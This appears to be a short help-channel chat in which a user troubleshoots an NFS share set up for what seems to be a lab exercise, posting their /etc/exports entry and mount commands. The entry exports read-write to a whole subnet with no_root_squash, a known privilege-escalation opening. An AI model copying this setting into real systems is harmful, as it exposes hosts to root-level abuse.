send in parts, do Ctrl +Z to undo your unsended message then copy paste in parts

strong sorrel
#

ok

brave scroll
#

it's an Question # 3 as well in exercise tab.

strong sorrel
#

here is my problem

i created a directory called "tar" with text file

cd /

$ tree tar
tar
└── tar.txt
#

i did sudo -i
became root

and edited the /etc/exports file to the subnet 172.16.61.0/24 and my computer IP is 172.16.61.128 (im trying to allows the subnet of my own ip and mount it to same ip as well )

sudo -i

nano /etc/exports

/tar/tar.txt 172.16.61.0/24(rw,sync,no_subtree_check,no_root_squash)

#

now i tried to mount in my own system by

sudo exportfs -ua
sudo exportfs -ra     # to clear all my priv tries

mkdir target-NFS
sudo mount -t nfs 172.16.61.128:/tar ./target-NFS -o nolock

but my output is always blank

brave scroll